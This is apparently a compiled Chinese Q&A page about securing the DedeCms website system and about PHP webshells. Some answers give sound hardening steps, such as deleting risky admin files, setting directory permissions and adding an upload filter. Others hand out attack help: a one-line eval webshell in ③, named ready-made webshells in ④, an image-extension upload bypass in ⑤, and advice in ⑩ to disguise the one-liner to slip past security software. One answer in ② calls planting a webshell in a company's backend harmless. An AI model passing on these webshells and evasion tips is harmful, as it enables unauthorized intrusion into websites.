① 2014最新DedeCms如何防止入侵
1. 安裝的時候資料庫的表前綴一點要改一下,不用dedecms默認的前綴dede的,可以改成,自己的名字或者o或0以假亂真的寫法。
2. 後台登錄開啟驗證碼功能,將默認管理員admin刪除,改成一個自己專用的,復雜點的賬號。
3. 裝好程序後務必刪除install目錄。
4. 將dedecms後台管理默認目錄名dede改掉。
5. 用不到的功能一概關閉,比如會員、評論等,如果沒有必要通通在後台關閉。
6. 以下一些是可以刪除的目錄:
member會員功能
special專題功能
company企業模塊
plus\guestbook留言板
以下是可以刪除的文件:
管理目錄下的這些文件是後台文件管理器,屬於多餘功能,而且最影響安全。file_manage_control.php file_manage_main.php file_manage_view.php media_add.php media_edit.php media_main.php
再有:不需要SQL命令運行器的將dede/sys_sql_query.php 文件刪除。
不需要tag功能請將根目錄下的tag.php刪除。
不需要頂客請將根目錄下的digg.php與diggindex.php刪除。
7. 多關注dedecms官方發布的安全補丁,及時打上補丁。
8. 下載發布功能(管理目錄下soft__xxx_xxx.php),不用的話可以刪掉,這個也比較容易上傳小馬的
9. 最安全的方式:本地發布html,然後上傳到空間。不包含任何動態內容,理論上最安全,不過維護相對來說比較麻煩。
10. 還是得經常檢查自己的網站,被掛黑鏈是小事,被掛木馬或刪程序就很慘了,運氣不好的話,排名也會跟著掉。所以還得記得時常備份數據!
11. 添加DedeCms官網出的萬能安全防護代碼(官網的要會員才能看),打開config_base.php文件,
找到以下這段代碼://禁止用戶提交某些特殊變數$ckvs = Array(『_GET』,'_POST』,'_COOKIE』,'_FILES』);foreach($ckvs as $ckv){if(is_array($$ckv)){foreach($$ckv AS $key => $value)if(eregi(「^(cfg_|globals)」,$key)) unset(${$ckv}[$key]);}}改為下面這段代碼://把get、post、cookie里的 $ckvs = Array('_GET','_POST','_COOKIE');foreach($ckvs as $ckv){if(is_array($$ckv)){foreach($$ckv AS $key => $value)if(!empty($value)){${$ckv}[$key] = str_replace(『<'.'?','&'.'lt;'.'?',$value);${$ckv}[$key] = str_replace('?'.'>『,』?』.』&』.』gt;』,${$ckv}[$key]);}if(eregi(「^cfg_|globals」,$key)) unset(${$ckv}[$key]);}}//檢測上傳的文件中是否有PHP代碼,有直接退出處理if (is_array($_FILES)) {foreach($_FILES AS $name => $value){${$name} = $value['tmp_name'];$fp = @fopen(${$name},』r');$fstr = @fread($fp,filesize(${$name}));@fclose($fp);if($fstr!=」 && ereg(「<\?」,$fstr)){echo 「你上傳的文件中含有危險內容,程序終止處理!」;exit();}}}
注意事項
• 網站安全是一點要的,要不然自己辛辛苦苦做的網站,讓黑客入侵了修改了一些重要的信息,排名就會下降。
• 日誌分析隔三差五的去做,這個可不能閑著,在日誌分析中可以精確的得到一些重要的信息。
② 請問我加了一個php小馬到公司後台,這個犯法嗎嚴重嗎
本著測試的目的是無傷大雅的,為了以後整公司的話,人家要是追究責任到你身上那就說不好咯~
③ 求插PHP的一句話小馬
eval("$_post[action]");
$_post[action] 是php語句 ,想寫什麼,就寫什麼。。。。
④ 什麼是小馬大馬,怎樣編寫
其實跟平時的腳本都是一樣的東西,沒啥好說。現在晚上的馬已經很多了,如果腳本不是很好的話,還是直接用現成的吧,asp類的有darkblade,php有phpspy,jsp有jspspy,aspx的有aspxspy。還有其它的,自己看著辦,我說的這些一般都不會有後門。關於網站檢測,可以看看前輩的經驗, http://www.fuxkit.com/index.php/blog/archive/oldjun-hack-site-experience。希望這些對你有用!
⑤ 求一個可以檢測PHP圖片木馬的方法!!! - 技術問答
你說的應該是網站IIS上傳漏洞吧?在.jpg圖片格式前,加上.asp或是php,由於程序對他對其格式的判斷不嚴格所以它可以上傳!這個上傳的網頁木馬一旦上傳成功!通過這個小馬,可以在上傳一份大馬!然後直接可以獲得網站最高許可權!可以將自己的網頁程序升級到最新,因為這個上傳漏洞比較早了!還可以取消上傳功能!
⑥ PHP小馬傳上去了,大馬傳不上去
從你給的描述和圖片無法判斷具體原因,大部分是某些waf軟體攔截了,但是得根據具體顯示信息才知道。
⑦ 我用織夢程序建了個網站,下載了個北極熊掃描器,掃描web漏洞,居然在我自己的網站上掃描出了100條
360網站安全檢測 你試試這個不過這個好像要求必須上線,織夢的網站漏洞本身就多,而且容易被攻擊,你的目錄人家都猜得到.因為用的人太多.我們這兒一個搞二次開發的小孩,不會編程大學學的是網路工程,他就會專門對dede進行攻擊(因為還有專門的教程如何對dede進行攻擊)
有些開源的為什麼要有那麼多漏洞呢?
他們的業務是對dede進行修改開發,以及補漏洞收費,但你自己下載使用不收費.就是您交錢了,我把漏洞給你修了,bug給你修復.您不交錢 您自行解決...不過也是人家也得吃飯...而且漏洞這東西永遠也補不幹凈,程序是人寫的 那必定有漏洞,只是相對問題大小.
dede 織夢 ecshop 我們公司接的都是些做企業站的,或者個人站長,千 八百的就做一個,這玩意接接私活,或者糊弄不懂行的客戶沒啥關系.你說要真自己補漏洞 真夠你受的.
我現在正用yii框架開發自己公司的cms呢,雖然我不是主力,分門別類的,其實就是把別人的cms系統仿一遍,但是這樣更安全一些,更好維護拓展
漏洞無窮盡,你網站代碼漏洞補好了,你還要注意你伺服器的安全各種配置,什麼許可權之類的,還有屏蔽錯誤信息神馬的.
這屬於web安全方面知識,我就一碼農,只管碼...
下面給你說說補漏洞
如果您使用了DedeCMS程序,請立即按如下流程處理:
1.在dedecms的後台更新補丁,盡可能升級為最新版本。
2.data、templets、uploads、install這幾個目錄用控制面板的「目錄保護」功能 禁止執行許可權 。
3.如果只是使用文章系統並沒有使用會員功能,則強推推薦:關閉會員功能、關閉新會員注冊、直接刪除member目錄或改名。
4.用dedecms後台的「系統」中的文件校驗和病毒掃描功能 查殺病毒木馬。
5.檢查有無/data/cache/t.php 、/data/cache/x.php和/plus/index.php 這些木馬文件,有的話則應立即刪除。
請及時關注dedecms的最新補丁,如果官方出新補丁,則應立即更新。
第一、安裝的時候資料庫的表前綴,最好改一下,不用dedecms默認的前綴dede_,可以改成ljs_,隨便一個名稱即可。
第二、後台登錄開啟驗證碼功能,將默認管理員admin刪除,改成一個自己專用的,復雜點的賬號,管理員密碼一定要長,至少8位,而且字母與數字混合。
第三、裝好程序後務必刪除install目錄
第四、將dedecms後台管理默認目錄名dede改掉。
第五、用不到的功能一概關閉,比如會員、評論等,如果沒有必要通通在後台關閉。
第六、以下一些是可以刪除的目錄:
member會員功能
special專題功能
company企業模塊
plus\guestbook留言板
以下是可以刪除的文件:
管理目錄下的這些文件是後台文件管理器,屬於多餘功能,而且最影響安全,許多HACK都是通過它來掛馬的
file_manage_control.php
file_manage_main.php
file_manage_view.php
media_add.php
media_edit.php
media_main.php
再有:
不需要SQL命令運行器的將dede/sys_sql_query.php 文件刪除。
不需要tag功能請將根目錄下的tag.php刪除。不需要頂客請將根目錄下的digg.php與diggindex.php刪除。
第七、多關注dedecms官方發布的安全補丁,及時打上補丁。
第八、下載發布功能(管理目錄下soft__xxx_xxx.php),不用的話可以刪掉,這個也比較容易上傳小馬的.
第九、DedeCms官網出的萬能安全防護代碼,登錄dedecms官網論壇查看.
第十、最安全的方式:本地發布html,然後上傳到空間。不包含任何動態內容,理論上最安全,不過維護相對來說比較麻煩。
第十一、由於黑客上傳惡意代碼的目錄主要是 /data /data/cache 和 /plus 這三個目錄,請務必設置這三個目錄的許可權,需要執行許可權的,請設置成不可寫,需要寫許可權的,請設置成不可執行,也就是這三個目錄的許可權要麼是555,要麼是644!
第十二,還是得經常檢查自己的網站,被掛黑鏈是小事,被掛木馬或刪程序就很慘了,運氣不好的話,排名也會跟著掉。所以還得記得時常備份數據.
⑧ 請教大家,常用的ASP小馬和PHP小馬有哪些
沒有絕對強大的馬
在好的馬 你也的放得進去
現在網上開源代碼多得是
你沒必要去瞎折騰
⑨ 請問在公司網站後台加了php小馬,被發現了,然後刪除了犯法嗎請問這
這得看給公司帶來多大損失,還有公司高層是否有意要追究此事。
如果給公司帶來不良後果或重大損失的話,公司是有權報案的。
如果損失不大,公司可能懶得跟你計較,不過至少會辭退你吧
⑩ php小馬的問題
404顯示並沒有上傳成功,有可能該伺服器安裝了安全狗類似的安全軟體,將一句話變形,重新上傳試試